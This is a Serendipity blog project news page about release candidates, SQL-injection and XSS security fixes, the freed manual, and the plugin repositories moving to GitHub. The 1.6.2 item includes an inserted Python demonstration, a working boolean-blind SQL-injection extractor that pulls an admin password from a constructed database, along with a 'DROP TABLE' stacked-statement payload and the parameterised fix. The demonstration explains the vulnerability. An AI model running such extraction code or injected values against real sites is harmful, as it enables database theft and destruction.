Serendipity 1.7-rc1

The 1.7-rc1 published today has an issue with older Serendipity plugins present on existing installations, which prevents Serendipity 1.7 from operating properly. While we fix this for an upcoming rc2, the problematic rc1 has been withdrawn for now.

Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.

The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code into a SQL query. Because our DB layer does not execute multiple statements and the affected query is not used to produce any output, we initially assumed the impact was limited. Thanks to Pawel Golen it was made clear to us that the issue can in fact be used to remotely read the database through blind SQL injection: the attacker only learns a yes/no answer per request, so the method is slow and creates a lot of traffic (many queries are needed to deduce the content), but it works. Thus you should definitely upgrade your installation.
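To make the "no output, single statement only, still exploitable" point concrete, here is an added example that is not part of this announcement and not Serendipity's code: a hypothetical lookup that concatenates an unescaped request parameter into a query (what magic_quotes_gpc being off amounts to) and never shows the row to the client, next to the same lookup with a bound parameter. The in-memory SQLite database, the table names and the admin password are constructed for the example. Python's sqlite3 module refuses stacked statements just like the DB layer described above, and the example shows that this does not stop boolean-blind extraction: the secret is recovered from yes/no answers alone, at seven queries per character.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the blog database; schema and
    secret are assumptions for this example, not Serendipity's real tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (username TEXT, password TEXT)")
    conn.execute("INSERT INTO authors VALUES ('admin', 's3cret')")
    conn.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO entries VALUES (1, 'First post')")
    return conn


def entry_exists_vulnerable(conn, entry_id):
    """Hypothetical vulnerable lookup: the request parameter is concatenated
    into the SQL unescaped (magic_quotes_gpc off).  No row data is returned
    to the caller, only whether something matched."""
    sql = "SELECT id FROM entries WHERE id = " + entry_id
    try:
        return conn.execute(sql).fetchone() is not None
    except (sqlite3.Warning, sqlite3.ProgrammingError, sqlite3.OperationalError):
        # Stacked statements ("1; DROP TABLE authors") are refused by
        # execute(), and syntax errors fail too; the caller just sees 'no match'.
        return False


def entry_exists_fixed(conn, entry_id):
    """Hardened lookup: a bound parameter keeps the input as data, never SQL."""
    row = conn.execute("SELECT id FROM entries WHERE id = ?", (entry_id,)).fetchone()
    return row is not None


def extract_blind(oracle, subquery, max_len=32):
    """Boolean-blind extraction: recover the text that `subquery` returns
    using nothing but yes/no answers from `oracle`.  Each character is found
    by binary search over its code point (0..127), i.e. 7 queries per
    character; code point 0 (substr past the end) marks the end of the text.
    Returns (recovered_text, number_of_queries_sent)."""
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"coalesce(unicode(substr(({subquery}), {pos}, 1)), 0) > {mid}"
            queries += 1
            if oracle("1 AND " + cond):  # entry 1 exists, so the answer is cond alone
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered, queries


ADMIN_PASSWORD = "SELECT password FROM authors WHERE username = 'admin'"


def demo():
    """Run the attack against both lookups and report what each one leaks."""
    conn = make_db()
    blocked = entry_exists_vulnerable(conn, "1; DROP TABLE authors") is False
    still_there = conn.execute("SELECT count(*) FROM authors").fetchone()[0] == 1
    return {
        "stacked_statement_blocked": blocked and still_there,
        "vulnerable_leaks": extract_blind(lambda p: entry_exists_vulnerable(conn, p), ADMIN_PASSWORD),
        "fixed_leaks": extract_blind(lambda p: entry_exists_fixed(conn, p), ADMIN_PASSWORD),
    }


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable lookup the six-character secret plus its terminator costs 49 requests, which is the "a lot of queries" the advisory update refers to; against the bound-parameter version every probe answers no and nothing is recovered. The fix is the second function, not the single-statement restriction.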

Serendipity is an open-source product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others in the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.

Serendipity 1.6.1 released

Serendipity 1.6.1 has just been released. As usual you can simply download from s9y.org, extract the archive, upload it to your webspace and accept the upgrader when visiting your blog.

This release mainly addresses two security issues found by Stefan Schurtz (thanks a lot, again!). One is an XSS issue in the media database panel, the other an SQL injection in the media database section. Both issues can only be exploited if you are logged in to your blog and click a specially crafted link, i.e. they require an authenticated victim. The SQL injection cannot be used to extract sensitive information from the database or to delete data.

Either way you are urged to upgrade your blog to the latest version. The development versions of 2.0 and 1.7 on github have these bugs fixed as well.

Other bugfixes in this version include:

  • Updated spamblock plugin for better wordfiltering on specific scenarios
  • Fixed draft/future entries preview links in backend
  • Fixed an issue where template-specific configuration options were not overwritten by the new global ones

You might also want to check out our quite stable 1.7 development version which uses Smarty3, or even our 2.0 development version which contains major rewrites so that Smarty is used in the backend!

Das Serendipity Handbuch / The Serendipity Manual

German version

The German "Serendipity Handbuch" was published by OpenSourcePress some time ago, and the publisher was kind enough to return the rights to the book's contents (thanks also to the active engagement of Dirk Deimeke and of course our great community).

This means the contents have now been released under a CC-BY-NC-SA licence and can be freely read, extended and possibly also translated by the community (that is: YOU!). Most of the manual still applies today, but there is plenty of room for improvement.

Have a look here: Das Serendipity Handbuch. The files are in LaTeX format, so you need a working LaTeX environment to compile them. The .tex files are plain text, though, so don't be shy. :-)

We are currently considering which format the whole thing should finally be kept in so that it is useful for users and contributors. We would be happy to discuss this with you in the forum.


English version

The German "Serendipity Manual" was published by OpenSourcePress some time ago. They were so kind as to revert the publishing rights back to our project (thanks to the great work of Dirk Deimeke and kind people like you), so that we can now publish it under a CC-BY-NC-SA license and let the community (read: YOU!) read the documentation for free, contribute to it, and hopefully even translate it into other languages. Many aspects of the book are still up to date, but surely many improvements can now be made.

Check it out here: The Serendipity Book. The files are written in LaTeX format, so you need a working LaTeX environment to compile it as PDF or other variants, if you like. We are currently working out the best format to use in the future; if you want, you can help us discuss this on the forums.

Searching for feedback of iOS developers

Grischa needs some help with updating the XML-RPC interface for more iOS clients. Here's the quote from his original post on the s9y forum:

At the moment I am enhancing the xml-rpc interface of Serendipity with WordPress functionality.

The idea: If Serendipity is able to emulate WordPress interfaces, we can use all the tools using it. WordPress is much more supported than S9Y as it is more known. I'm aiming at the mobile clients available for WordPress blogs in particular at the moment.

The problem: The enhancements are nearly ready and successfully tested with the official WP for Android client, blogsy on iOS for iPad and MarsEdit and ecto for Mac. What is missing is the app for the iphone. The official WP for iOS client is able to register the blog and reads some categories but then it crashes without any message.

The developer team of WP for iOS was not very helpful on that but the client is available as Open Source.

As I am not able to debug iOS apps (I don't even have a Mac) I'm seeking an iOS developer being s9y fan, too, who is able to debug what goes wrong there, so I can finalize my changes on the s9y xml-rpc interface.

Thanks!

Spartacus infrastructure change, Developers please read

Since the core Serendipity project is now maintained on github.com and every developer is quite happy about that, we decided to go the jquery-plugins route and delete all Serendipity plugins.

No, just kidding. We actually imported all data from the SourceForge.net CVS servers into the github infrastructure. The short version for normal end-users: Nothing should change for you!

https://github.com/s9y/additional_plugins

https://github.com/s9y/additional_themes

All current Serendipity developers also have access to those repositories to contribute code. Developers should no longer commit code to CVS (actually, they can't, because I took all their committing karma *eg*).

The harder task for the Spartacus infrastructure service is the actual publishing of data. The Spartacus plugin operates on a PEAR-like XML format for each plugin, which luckily is automatically generated by a small shellscript which runs once daily on one of our webservers (emerge.sh). That script iterates on a checkout of all plugins and templates, creates the XML and uploads it to all mirror servers (currently netmirror.org, s9y.org and now also github.com).

Downloading the files also works either via the files that are uploaded daily to netmirror.org and s9y.org, or via the SourceForge.net server, which publishes the files through a nasty ViewVC oddity. The Spartacus plugin in the current github core code (version 2.25) can now also retrieve those files from the github.com servers.

For all users that currently use the Spartacus plugin with the SourceForge.Net mirror, our daily script now pushes all changes in the GitHub tree also to CVS, so that both repositories *should* be kept in sync. This is done via the gitclone.sh and gitclone.php scripts in the additional_plugins repository, for anyone that's interested.

Most likely, something in this script won't work properly, so over the next few days some glitches in the matrix may occur. In that case, please report issues and remain seated. Or buy christmas presents for your beloved. Or your beloved developers.